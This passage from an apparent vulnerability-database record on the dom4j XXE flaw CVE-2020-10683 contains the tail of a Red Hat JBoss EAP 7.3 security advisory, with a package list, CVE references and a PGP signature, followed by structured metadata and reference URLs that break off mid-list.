1.4.22.Final\nJBEAP-19203 - (7.3.z) WFCORE-4850 - Updating mockserver to 5.9.0. 
Exclusion of dependency from xom.io7m\nJBEAP-19205 - (7.3.z) Upgrade WildFly Core from 10.1.5.Final-redhat-00001 to 10.1.x\nJBEAP-19269 - [GSS](7.3.z) Upgrade jboss-logmanager from 2.1.14.Final to 2.1.15.Final\nJBEAP-19322 - (7.3.z) Upgrade XNIO from 3.7.7 to 3.7.8.SP1\nJBEAP-19325 - (7.3.z) Upgrade Infinispan from 9.4.18.Final-redhat-00001 to 9.4.19.Final-redhat-00001\nJBEAP-19397 - (7.3.z) Upgrade JSF based on Mojarra 2.3.9.SP09-redhat-00001 to 2.3.9.SP11-redhat-00001\nJBEAP-19409 - Tracker bug for the EAP 7.3.2 release for RHEL-6\nJBEAP-19529 - (7.3.z) Update PR template to include PR-processor hints. \nJBEAP-19564 - [GSS](7.3.z) Upgrade jboss-ejb-client from 4.0.31.Final-redhat-00001 to 4.0.33.Final-redhat-00001\nJBEAP-19585 - [GSS](7.3.z) Upgrade org.jboss.genericjms from 2.0.4 to 2.0.6\nJBEAP-19617 - (7.3.z) Upgrade wildfly-naming-client from 1.0.12.Final-redhat-00001 to 1.0.13.Final-redhat-00001\nJBEAP-19619 - (7.3.z) Upgrade JBoss JSF API from 3.0.0.SP02-redhat-00001 to 3.0.0.SP04-redhat-00001\nJBEAP-19673 - (7.3.z) [WFCORE] Upgrade WildFly Common to 1.5.2.Final\nJBEAP-19674 - (7.3.z) [WFCORE] Upgrade galleon and wildfly-galleon-plugins from 4.1.2.Final to 4.2.4.Final\nJBEAP-19874 - [GSS](7.3.z) Upgrade wildfly-http-client from 1.0.21.Final-redhat-00001 to 1.0.22.Final-redhat-00001\n\n7. 
Package List:\n\nRed Hat JBoss EAP 7.3 for RHEL 6 Server:\n\nSource:\neap7-dom4j-2.1.3-1.redhat_00001.1.el6eap.src.rpm\neap7-elytron-web-1.6.2-1.Final_redhat_00001.1.el6eap.src.rpm\neap7-glassfish-jsf-2.3.9-11.SP11_redhat_00001.1.el6eap.src.rpm\neap7-hal-console-3.2.9-1.Final_redhat_00001.1.el6eap.src.rpm\neap7-hibernate-5.3.17-1.Final_redhat_00001.1.el6eap.src.rpm\neap7-hibernate-validator-6.0.20-1.Final_redhat_00001.1.el6eap.src.rpm\neap7-infinispan-9.4.19-1.Final_redhat_00001.1.el6eap.src.rpm\neap7-ironjacamar-1.4.22-1.Final_redhat_00001.1.el6eap.src.rpm\neap7-jackson-annotations-2.10.4-1.redhat_00001.1.el6eap.src.rpm\neap7-jackson-core-2.10.4-1.redhat_00001.1.el6eap.src.rpm\neap7-jackson-databind-2.10.4-1.redhat_00001.1.el6eap.src.rpm\neap7-jackson-jaxrs-providers-2.10.4-1.redhat_00001.1.el6eap.src.rpm\neap7-jackson-modules-base-2.10.4-1.redhat_00001.1.el6eap.src.rpm\neap7-jackson-modules-java8-2.10.4-1.redhat_00001.1.el6eap.src.rpm\neap7-jboss-genericjms-2.0.6-1.Final_redhat_00001.1.el6eap.src.rpm\neap7-jboss-jsf-api_2.3_spec-3.0.0-4.SP04_redhat_00001.1.el6eap.src.rpm\neap7-jboss-logmanager-2.1.15-1.Final_redhat_00001.1.el6eap.src.rpm\neap7-jboss-server-migration-1.7.1-7.Final_redhat_00009.1.el6eap.src.rpm\neap7-jboss-xnio-base-3.7.8-1.SP1_redhat_00001.1.el6eap.src.rpm\neap7-netty-4.1.48-1.Final_redhat_00001.1.el6eap.src.rpm\neap7-undertow-2.0.30-4.SP4_redhat_00001.1.el6eap.src.rpm\neap7-wildfly-7.3.2-4.GA_redhat_00002.1.el6eap.src.rpm\neap7-wildfly-common-1.5.2-1.Final_redhat_00002.1.el6eap.src.rpm\neap7-wildfly-elytron-1.10.7-1.Final_redhat_00001.1.el6eap.src.rpm\neap7-wildfly-http-client-1.0.22-1.Final_redhat_00001.1.el6eap.src.rpm\n\nnoarch:\neap7-dom4j-2.1.3-1.redhat_00001.1.el6eap.noarch.rpm\neap7-glassfish-jsf-2.3.9-11.SP11_redhat_00001.1.el6eap.noarch.rpm\neap7-hal-console-3.2.9-1.Final_redhat_00001.1.el6eap.noarch.rpm\neap7-hibernate-5.3.17-1.Final_redhat_00001.1.el6eap.noarch.rpm\neap7-hibernate-core-5.3.17-1.Final_redhat_00001.1.el6eap.noarch.rpm\nea
p7-hibernate-entitymanager-5.3.17-1.Final_redhat_00001.1.el6eap.noarch.rpm\neap7-hibernate-envers-5.3.17-1.Final_redhat_00001.1.el6eap.noarch.rpm\neap7-hibernate-java8-5.3.17-1.Final_redhat_00001.1.el6eap.noarch.rpm\neap7-hibernate-validator-6.0.20-1.Final_redhat_00001.1.el6eap.noarch.rpm\neap7-hibernate-validator-cdi-6.0.20-1.Final_redhat_00001.1.el6eap.noarch.rpm\neap7-infinispan-9.4.19-1.Final_redhat_00001.1.el6eap.noarch.rpm\neap7-infinispan-cachestore-jdbc-9.4.19-1.Final_redhat_00001.1.el6eap.noarch.rpm\neap7-infinispan-cachestore-remote-9.4.19-1.Final_redhat_00001.1.el6eap.noarch.rpm\neap7-infinispan-client-hotrod-9.4.19-1.Final_redhat_00001.1.el6eap.noarch.rpm\neap7-infinispan-commons-9.4.19-1.Final_redhat_00001.1.el6eap.noarch.rpm\neap7-infinispan-core-9.4.19-1.Final_redhat_00001.1.el6eap.noarch.rpm\neap7-infinispan-hibernate-cache-commons-9.4.19-1.Final_redhat_00001.1.el6eap.noarch.rpm\neap7-infinispan-hibernate-cache-spi-9.4.19-1.Final_redhat_00001.1.el6eap.noarch.rpm\neap7-infinispan-hibernate-cache-v53-9.4.19-1.Final_redhat_00001.1.el6eap.noarch.rpm\neap7-ironjacamar-1.4.22-1.Final_redhat_00001.1.el6eap.noarch.rpm\neap7-ironjacamar-common-api-1.4.22-1.Final_redhat_00001.1.el6eap.noarch.rpm\neap7-ironjacamar-common-impl-1.4.22-1.Final_redhat_00001.1.el6eap.noarch.rpm\neap7-ironjacamar-common-spi-1.4.22-1.Final_redhat_00001.1.el6eap.noarch.rpm\neap7-ironjacamar-core-api-1.4.22-1.Final_redhat_00001.1.el6eap.noarch.rpm\neap7-ironjacamar-core-impl-1.4.22-1.Final_redhat_00001.1.el6eap.noarch.rpm\neap7-ironjacamar-deployers-common-1.4.22-1.Final_redhat_00001.1.el6eap.noarch.rpm\neap7-ironjacamar-jdbc-1.4.22-1.Final_redhat_00001.1.el6eap.noarch.rpm\neap7-ironjacamar-validator-1.4.22-1.Final_redhat_00001.1.el6eap.noarch.rpm\neap7-jackson-annotations-2.10.4-1.redhat_00001.1.el6eap.noarch.rpm\neap7-jackson-core-2.10.4-1.redhat_00001.1.el6eap.noarch.rpm\neap7-jackson-databind-2.10.4-1.redhat_00001.1.el6eap.noarch.rpm\neap7-jackson-datatype-jdk8-2.10.4-1.redhat_00001
.1.el6eap.noarch.rpm\neap7-jackson-datatype-jsr310-2.10.4-1.redhat_00001.1.el6eap.noarch.rpm\neap7-jackson-jaxrs-base-2.10.4-1.redhat_00001.1.el6eap.noarch.rpm\neap7-jackson-jaxrs-json-provider-2.10.4-1.redhat_00001.1.el6eap.noarch.rpm\neap7-jackson-module-jaxb-annotations-2.10.4-1.redhat_00001.1.el6eap.noarch.rpm\neap7-jackson-modules-base-2.10.4-1.redhat_00001.1.el6eap.noarch.rpm\neap7-jackson-modules-java8-2.10.4-1.redhat_00001.1.el6eap.noarch.rpm\neap7-jboss-genericjms-2.0.6-1.Final_redhat_00001.1.el6eap.noarch.rpm\neap7-jboss-jsf-api_2.3_spec-3.0.0-4.SP04_redhat_00001.1.el6eap.noarch.rpm\neap7-jboss-logmanager-2.1.15-1.Final_redhat_00001.1.el6eap.noarch.rpm\neap7-jboss-server-migration-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm\neap7-jboss-server-migration-cli-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm\neap7-jboss-server-migration-core-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm\neap7-jboss-server-migration-eap6.4-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm\neap7-jboss-server-migration-eap6.4-to-eap7.3-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm\neap7-jboss-server-migration-eap7.0-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm\neap7-jboss-server-migration-eap7.1-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm\neap7-jboss-server-migration-eap7.2-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm\neap7-jboss-server-migration-eap7.2-to-eap7.3-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm\neap7-jboss-server-migration-eap7.3-server-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm\neap7-jboss-server-migration-wildfly10.0-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm\neap7-jboss-server-migration-wildfly10.1-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm\neap7-jboss-server-migration-wildfly11.0-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm\neap7-jboss-server-migration-wildfly12.0-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm\neap7-jboss-server-migration-wildfly13.0-server-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm\neap7-jboss-server-migration-wildfly1
4.0-server-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm\neap7-jboss-server-migration-wildfly15.0-server-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm\neap7-jboss-server-migration-wildfly16.0-server-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm\neap7-jboss-server-migration-wildfly17.0-server-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm\neap7-jboss-server-migration-wildfly18.0-server-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm\neap7-jboss-server-migration-wildfly8.2-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm\neap7-jboss-server-migration-wildfly9.0-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm\neap7-jboss-xnio-base-3.7.8-1.SP1_redhat_00001.1.el6eap.noarch.rpm\neap7-netty-4.1.48-1.Final_redhat_00001.1.el6eap.noarch.rpm\neap7-netty-all-4.1.48-1.Final_redhat_00001.1.el6eap.noarch.rpm\neap7-undertow-2.0.30-4.SP4_redhat_00001.1.el6eap.noarch.rpm\neap7-undertow-server-1.6.2-1.Final_redhat_00001.1.el6eap.noarch.rpm\neap7-wildfly-7.3.2-4.GA_redhat_00002.1.el6eap.noarch.rpm\neap7-wildfly-common-1.5.2-1.Final_redhat_00002.1.el6eap.noarch.rpm\neap7-wildfly-elytron-1.10.7-1.Final_redhat_00001.1.el6eap.noarch.rpm\neap7-wildfly-elytron-tool-1.10.7-1.Final_redhat_00001.1.el6eap.noarch.rpm\neap7-wildfly-http-client-common-1.0.22-1.Final_redhat_00001.1.el6eap.noarch.rpm\neap7-wildfly-http-ejb-client-1.0.22-1.Final_redhat_00001.1.el6eap.noarch.rpm\neap7-wildfly-http-naming-client-1.0.22-1.Final_redhat_00001.1.el6eap.noarch.rpm\neap7-wildfly-http-transaction-client-1.0.22-1.Final_redhat_00001.1.el6eap.noarch.rpm\neap7-wildfly-javadocs-7.3.2-4.GA_redhat_00002.1.el6eap.noarch.rpm\neap7-wildfly-modules-7.3.2-4.GA_redhat_00002.1.el6eap.noarch.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n8. 
References:\n\nhttps://access.redhat.com/security/cve/CVE-2019-14900\nhttps://access.redhat.com/security/cve/CVE-2020-1710\nhttps://access.redhat.com/security/cve/CVE-2020-1748\nhttps://access.redhat.com/security/cve/CVE-2020-10672\nhttps://access.redhat.com/security/cve/CVE-2020-10673\nhttps://access.redhat.com/security/cve/CVE-2020-10683\nhttps://access.redhat.com/security/cve/CVE-2020-10687\nhttps://access.redhat.com/security/cve/CVE-2020-10693\nhttps://access.redhat.com/security/cve/CVE-2020-10714\nhttps://access.redhat.com/security/cve/CVE-2020-10718\nhttps://access.redhat.com/security/cve/CVE-2020-10740\nhttps://access.redhat.com/security/cve/CVE-2020-14297\nhttps://access.redhat.com/security/updates/classification/#important\nhttps://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.3/\nhttps://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.3/html-single/installation_guide/\n\n9. Contact:\n\nThe Red Hat security contact is <secalert@redhat.com>. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2020 Red Hat, Inc. 
\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBXzqIS9zjgjWX9erEAQjYNxAAk4rojlcRbfjwu0wlWLTU1MbxQNclVtVh\nMpQnFzyvJVVXX0lslx7NGxHlRNWRgqI/XC1QDqlHpRs4du5/a2Uj+8c5u+WPQefF\nQCqOvSntbMli42/I7+fCehLVofx/HkuAVcBoGrIGby1E4rddDljh4bH3r43I7wa5\nHN9ki8uFAy8bIAzfXW+RB4rxtnsAABv/VFoH1fWmrXCXE6A6aG+AU86ddty0JQHN\nJhQp6v/X/3ccCvHYTAO8vlbqIJ4fE86e1+5oRBor+4ZD4mMVzGKm4cf8CMPXsKIB\n9dFGo8WHFBgEi4hBbBFtFfaE2DGZ6K4Q7X0IAhiiYJmpPg8NgzGiqVvOAG+/OrBz\nDE84ZPxZwS1zR82wwIyHP4W5mYIhQTxhtp+E9Klu4gpFIAmK8bVfGf2Ub0HOCS6z\nsbN1Eiv0SBfWRHBfBkuRTBd0aEcmGRNl4GSXzXtanTf0OhFk/4pxdJPmKDEBFWvg\n3dtwFi7+/8JoAch8GKQCo4UoSo6etQu45sUH6Q8ozuxYA72+J9K7cpwp/fVhiYRT\nnruC+2HDuugrC8UVJ/24E++49omdSXAm+UR9tvkFdVU3IpXLJNWO8s4QbrGC7CN7\nLvg/ukygGhrEEyQ1J9yYSeeNISQWJGOSKj/bgYRAh/AbX/QcZZfus7ppAasNjndn\nBk4PSTq9yaw=\n=ZNiG\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. Summary:\n\nThis is a security update for JBoss EAP Continuous Delivery 20. \n\nThe References section of this erratum contains a download link (you must\nlog in to download the update). 
\n\nThe JBoss server process must be restarted for the update to take effect", sources: [ { db: "NVD", id: "CVE-2020-10683", }, { db: "VULHUB", id: "VHN-163186", }, { db: "PACKETSTORM", id: "159544", }, { db: "PACKETSTORM", id: "159924", }, { db: "PACKETSTORM", id: "158884", }, { db: "PACKETSTORM", id: "159081", }, { db: "PACKETSTORM", id: "159015", }, { db: "PACKETSTORM", id: "158891", }, { db: "PACKETSTORM", id: "159080", }, { db: "PACKETSTORM", id: "158881", }, ], trust: 1.71, }, exploit_availability: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { reference: "https://www.scap.org.cn/vuln/vhn-163186", trust: 0.1, type: "unknown", }, ], sources: [ { db: "VULHUB", id: "VHN-163186", }, ], }, external_ids: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { db: "NVD", id: "CVE-2020-10683", trust: 2.5, }, { db: "PACKETSTORM", id: "158891", trust: 0.8, }, { db: "PACKETSTORM", id: "159544", trust: 0.8, }, { db: "PACKETSTORM", id: "159015", trust: 0.8, }, { db: "CNNVD", id: "CNNVD-202004-1133", trust: 0.7, }, { db: "PACKETSTORM", id: "159083", trust: 0.7, }, { db: "PACKETSTORM", id: "159921", trust: 0.7, }, { db: "PACKETSTORM", id: "160562", trust: 0.7, }, { db: "PACKETSTORM", id: "158916", trust: 0.7, }, { db: "AUSCERT", id: "ESB-2020.2837", trust: 0.6, }, { db: "AUSCERT", id: "ESB-2020.4464", trust: 0.6, }, { db: "AUSCERT", id: "ESB-2020.2087", trust: 0.6, }, { db: "AUSCERT", id: "ESB-2020.2826", trust: 0.6, }, { db: "AUSCERT", id: "ESB-2020.1581", trust: 0.6, }, { db: "AUSCERT", id: "ESB-2023.3781", trust: 0.6, }, { db: "AUSCERT", id: "ESB-2020.3894", trust: 0.6, }, { db: "AUSCERT", id: "ESB-2020.2992", trust: 0.6, }, 
{ db: "AUSCERT", id: "ESB-2020.3742", trust: 0.6, }, { db: "AUSCERT", id: "ESB-2020.3513", trust: 0.6, }, { db: "AUSCERT", id: "ESB-2020.3065", trust: 0.6, }, { db: "CS-HELP", id: "SB2021042542", trust: 0.6, }, { db: "CS-HELP", id: "SB2021072165", trust: 0.6, }, { db: "CS-HELP", id: "SB2022072096", trust: 0.6, }, { db: "CS-HELP", id: "SB2021042642", trust: 0.6, }, { db: "CS-HELP", id: "SB2021072747", trust: 0.6, }, { db: "NSFOCUS", id: "47453", trust: 0.6, }, { db: "PACKETSTORM", id: "159081", trust: 0.2, }, { db: "PACKETSTORM", id: "158881", trust: 0.2, }, { db: "PACKETSTORM", id: "159080", trust: 0.2, }, { db: "PACKETSTORM", id: "159924", trust: 0.2, }, { db: "PACKETSTORM", id: "158884", trust: 0.2, }, { db: "PACKETSTORM", id: "158889", trust: 0.1, }, { db: "PACKETSTORM", id: "159082", trust: 0.1, }, { db: "CNVD", id: "CNVD-2020-33467", trust: 0.1, }, { db: "VULHUB", id: "VHN-163186", trust: 0.1, }, ], sources: [ { db: "VULHUB", id: "VHN-163186", }, { db: "PACKETSTORM", id: "159544", }, { db: "PACKETSTORM", id: "159924", }, { db: "PACKETSTORM", id: "158884", }, { db: "PACKETSTORM", id: "159081", }, { db: "PACKETSTORM", id: "159015", }, { db: "PACKETSTORM", id: "158891", }, { db: "PACKETSTORM", id: "159080", }, { db: "PACKETSTORM", id: "158881", }, { db: "CNNVD", id: "CNNVD-202004-1133", }, { db: "NVD", id: "CVE-2020-10683", }, ], }, id: "VAR-202005-1054", iot: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: true, sources: [ { db: "VULHUB", id: "VHN-163186", }, ], trust: 0.01, }, last_update_date: "2024-11-29T21:58:44.698000Z", patch: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { title: "dom4j Fixes for code issue vulnerabilities", trust: 0.6, url: 
"http://123.124.177.30/web/xxk/bdxqById.tag?id=116859", }, ], sources: [ { db: "CNNVD", id: "CNNVD-202004-1133", }, ], }, problemtype_data: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { problemtype: "CWE-611", trust: 1.1, }, ], sources: [ { db: "VULHUB", id: "VHN-163186", }, { db: "NVD", id: "CVE-2020-10683", }, ], }, references: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { trust: 2.3, url: "https://www.oracle.com/security-alerts/cpuapr2021.html", }, { trust: 2.3, url: "https://www.oracle.com/security-alerts/cpujan2021.html", }, { trust: 2.3, url: "https://www.oracle.com/security-alerts/cpujul2020.html", }, { trust: 2.3, url: "https://www.oracle.com/security-alerts/cpuoct2020.html", }, { trust: 2.3, url: "https://www.oracle.com/security-alerts/cpuoct2021.html", }, { trust: 1.7, url: "https://github.com/dom4j/dom4j/commit/a8228522a99a02146106672a34c104adbda5c658", }, { trust: 1.7, url: "https://github.com/dom4j/dom4j/releases/tag/version-2.1.3", }, { trust: 1.7, url: "https://security.netapp.com/advisory/ntap-20200518-0002/", }, { trust: 1.7, url: "https://bugzilla.redhat.com/show_bug.cgi?id=1694235", }, { trust: 1.7, url: "https://cheatsheetseries.owasp.org/cheatsheets/xml_external_entity_prevention_cheat_sheet.html", }, { trust: 1.7, url: "https://github.com/dom4j/dom4j/commits/version-2.0.3", }, { trust: 1.7, url: "https://github.com/dom4j/dom4j/issues/87", }, { trust: 1.7, url: "https://www.oracle.com//security-alerts/cpujul2021.html", }, { trust: 1.7, url: "https://www.oracle.com/security-alerts/cpujan2022.html", }, { trust: 1.7, url: "https://www.oracle.com/security-alerts/cpujul2022.html", }, { trust: 1.7, url: 
"http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00061.html", }, { trust: 1.7, url: "https://usn.ubuntu.com/4575-1/", }, { trust: 1.4, url: "https://nvd.nist.gov/vuln/detail/cve-2020-10683", }, { trust: 1.3, url: "https://access.redhat.com/security/cve/cve-2020-10683", }, { trust: 1, url: "https://lists.apache.org/thread.html/r91c64cd51e68e97d524395474eaa25362d564572276b9917fcbf5c32%40%3cdev.velocity.apache.org%3e", }, { trust: 1, url: "https://lists.apache.org/thread.html/r51f3f9801058e47153c0ad9bc6209d57a592fc0e7aefd787760911b8%40%3cdev.velocity.apache.org%3e", }, { trust: 1, url: "https://lists.apache.org/thread.html/rb1b990d7920ae0d50da5109b73b92bab736d46c9788dd4b135cb1a51%40%3cnotifications.freemarker.apache.org%3e", }, { trust: 0.7, url: "https://lists.apache.org/thread.html/rb1b990d7920ae0d50da5109b73b92bab736d46c9788dd4b135cb1a51@%3cnotifications.freemarker.apache.org%3e", }, { trust: 0.7, url: "https://lists.apache.org/thread.html/r91c64cd51e68e97d524395474eaa25362d564572276b9917fcbf5c32@%3cdev.velocity.apache.org%3e", }, { trust: 0.7, url: "https://lists.apache.org/thread.html/r51f3f9801058e47153c0ad9bc6209d57a592fc0e7aefd787760911b8@%3cdev.velocity.apache.org%3e", }, { trust: 0.7, url: "https://access.redhat.com/security/cve/cve-2020-10714", }, { trust: 0.7, url: "https://nvd.nist.gov/vuln/detail/cve-2019-14900", }, { trust: 0.7, url: "https://access.redhat.com/security/team/contact/", }, { trust: 0.7, url: "https://www.redhat.com/mailman/listinfo/rhsa-announce", }, { trust: 0.7, url: "https://nvd.nist.gov/vuln/detail/cve-2020-10714", }, { trust: 0.7, url: "https://bugzilla.redhat.com/):", }, { trust: 0.7, url: "https://access.redhat.com/security/cve/cve-2019-14900", }, { trust: 0.6, url: "https://nvd.nist.gov/vuln/detail/cve-2020-10693", }, { trust: 0.6, url: "https://access.redhat.com/security/cve/cve-2020-10693", }, { trust: 0.6, url: "https://nvd.nist.gov/vuln/detail/cve-2020-1748", }, { trust: 0.6, url: 
"https://access.redhat.com/security/cve/cve-2020-1748", }, { trust: 0.6, url: "https://nvd.nist.gov/vuln/detail/cve-2020-10740", }, { trust: 0.6, url: "https://access.redhat.com/security/updates/classification/#important", }, { trust: 0.6, url: "https://access.redhat.com/security/cve/cve-2020-10673", }, { trust: 0.6, url: "https://access.redhat.com/security/cve/cve-2020-10740", }, { trust: 0.6, url: "https://nvd.nist.gov/vuln/detail/cve-2020-10673", }, { trust: 0.6, url: "https://www.auscert.org.au/bulletins/esb-2020.3513/", }, { trust: 0.6, url: "https://www.auscert.org.au/bulletins/esb-2023.3781", }, { trust: 0.6, url: "https://packetstormsecurity.com/files/160562/red-hat-security-advisory-2020-5568-01.html", }, { trust: 0.6, url: "https://www.cybersecurity-help.cz/vdb/sb2022072096", }, { trust: 0.6, url: "https://www.auscert.org.au/bulletins/esb-2020.2992/", }, { trust: 0.6, url: "https://packetstormsecurity.com/files/159544/ubuntu-security-notice-usn-4575-1.html", }, { trust: 0.6, url: "https://www.auscert.org.au/bulletins/esb-2020.4464/", }, { trust: 0.6, url: "https://www.auscert.org.au/bulletins/esb-2020.2087/", }, { trust: 0.6, url: "https://packetstormsecurity.com/files/159015/red-hat-security-advisory-2020-3585-01.html", }, { trust: 0.6, url: "https://www.cybersecurity-help.cz/vdb/sb2021072165", }, { trust: 0.6, url: "https://packetstormsecurity.com/files/159921/red-hat-security-advisory-2020-4960-01.html", }, { trust: 0.6, url: "https://www.auscert.org.au/bulletins/esb-2020.2837/", }, { trust: 0.6, url: "https://www.ibm.com/support/pages/node/6525182", }, { trust: 0.6, url: "https://www.oracle.com/security-alerts/cpujul2021.html", }, { trust: 0.6, url: "https://packetstormsecurity.com/files/158916/red-hat-security-advisory-2020-3501-01.html", }, { trust: 0.6, url: "http://www.nsfocus.net/vulndb/47453", }, { trust: 0.6, url: "https://www.auscert.org.au/bulletins/esb-2020.3894/", }, { trust: 0.6, url: "https://www.auscert.org.au/bulletins/esb-2020.1581/", 
}, { trust: 0.6, url: "https://www.ibm.com/blogs/psirt/security-bulletinibm-resilient-soar-is-using-components-with-known-vulnerabilities-dom4j-cve-2020-10683/", }, { trust: 0.6, url: "https://packetstormsecurity.com/files/158891/red-hat-security-advisory-2020-3463-01.html", }, { trust: 0.6, url: "https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-in-jquery-spring-dom4j-mongodb-linux-kernel-targetcli-fb-jackson-node-js-and-apache-commons-affect-ibm-spectrum-protect-plus/", }, { trust: 0.6, url: "https://www.cybersecurity-help.cz/vdb/sb2021042542", }, { trust: 0.6, url: "https://www.cybersecurity-help.cz/vdb/sb2021072747", }, { trust: 0.6, url: "https://www.cybersecurity-help.cz/vdb/sb2021042642", }, { trust: 0.6, url: "https://www.auscert.org.au/bulletins/esb-2020.2826/", }, { trust: 0.6, url: "https://vigilance.fr/vulnerability/dom4j-external-xml-entity-injection-via-saxreader-32161", }, { trust: 0.6, url: "https://www.ibm.com/blogs/psirt/security-bulletin-dom4j-as-used-by-ibm-qradar-siem-contains-multiple-vulnerabilities-cve-2018-1000632-cve-2020-10683/", }, { trust: 0.6, url: "https://www.auscert.org.au/bulletins/esb-2020.3742/", }, { trust: 0.6, url: "https://packetstormsecurity.com/files/159083/red-hat-security-advisory-2020-3642-01.html", }, { trust: 0.6, url: "https://www.auscert.org.au/bulletins/esb-2020.3065/", }, { trust: 0.5, url: "https://issues.jboss.org/):", }, { trust: 0.5, url: "https://nvd.nist.gov/vuln/detail/cve-2020-1710", }, { trust: 0.5, url: "https://nvd.nist.gov/vuln/detail/cve-2020-14297", }, { trust: 0.5, url: "https://access.redhat.com/security/cve/cve-2020-10672", }, { trust: 0.5, url: "https://nvd.nist.gov/vuln/detail/cve-2020-10687", }, { trust: 0.5, url: "https://access.redhat.com/security/cve/cve-2020-14297", }, { trust: 0.5, url: "https://nvd.nist.gov/vuln/detail/cve-2020-10672", }, { trust: 0.5, url: "https://access.redhat.com/security/cve/cve-2020-10687", }, { trust: 0.5, url: 
"https://access.redhat.com/security/cve/cve-2020-1710", }, { trust: 0.5, url: "https://access.redhat.com/security/cve/cve-2020-10718", }, { trust: 0.5, url: "https://nvd.nist.gov/vuln/detail/cve-2020-10718", }, { trust: 0.4, url: "https://access.redhat.com/articles/11258", }, { trust: 0.4, url: "https://access.redhat.com/security/team/key/", }, { trust: 0.3, url: "https://access.redhat.com/security/cve/cve-2020-6950", }, { trust: 0.3, url: "https://nvd.nist.gov/vuln/detail/cve-2020-6950", }, { trust: 0.3, url: "https://nvd.nist.gov/vuln/detail/cve-2020-14307", }, { trust: 0.3, url: "https://access.redhat.com/security/cve/cve-2020-14307", }, { trust: 0.2, url: "https://nvd.nist.gov/vuln/detail/cve-2020-1954", }, { trust: 0.2, url: "https://access.redhat.com/security/cve/cve-2020-1954", }, { trust: 0.2, url: "https://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.3/html-single/installation_guide/", }, { trust: 0.2, url: "https://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.3/", }, { trust: 0.2, url: "https://access.redhat.com/security/cve/cve-2020-9547", }, { trust: 0.2, url: "https://access.redhat.com/security/cve/cve-2020-1695", }, { trust: 0.2, url: "https://access.redhat.com/security/cve/cve-2020-9546", }, { trust: 0.2, url: "https://nvd.nist.gov/vuln/detail/cve-2020-9547", }, { trust: 0.2, url: "https://access.redhat.com/security/cve/cve-2020-9548", }, { trust: 0.2, url: "https://nvd.nist.gov/vuln/detail/cve-2020-1695", }, { trust: 0.2, url: "https://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.2/html-single/installation_guide/", }, { trust: 0.2, url: "https://nvd.nist.gov/vuln/detail/cve-2020-9548", }, { trust: 0.2, url: "https://access.redhat.com/security/cve/cve-2020-8840", }, { trust: 0.2, url: "https://nvd.nist.gov/vuln/detail/cve-2020-9546", }, { trust: 0.2, url: 
"https://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.2/", }, { trust: 0.2, url: "https://nvd.nist.gov/vuln/detail/cve-2020-8840", }, { trust: 0.1, url: "https://usn.ubuntu.com/4575-1", }, { trust: 0.1, url: "https://launchpad.net/ubuntu/+source/dom4j/1.6.1+dfsg.3-2ubuntu1.1", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2020-2875", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2020-2934", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2020-2933", }, { trust: 0.1, url: "https://access.redhat.com/errata/rhsa-2020:4961", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2019-17566", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2020-1945", }, { trust: 0.1, url: 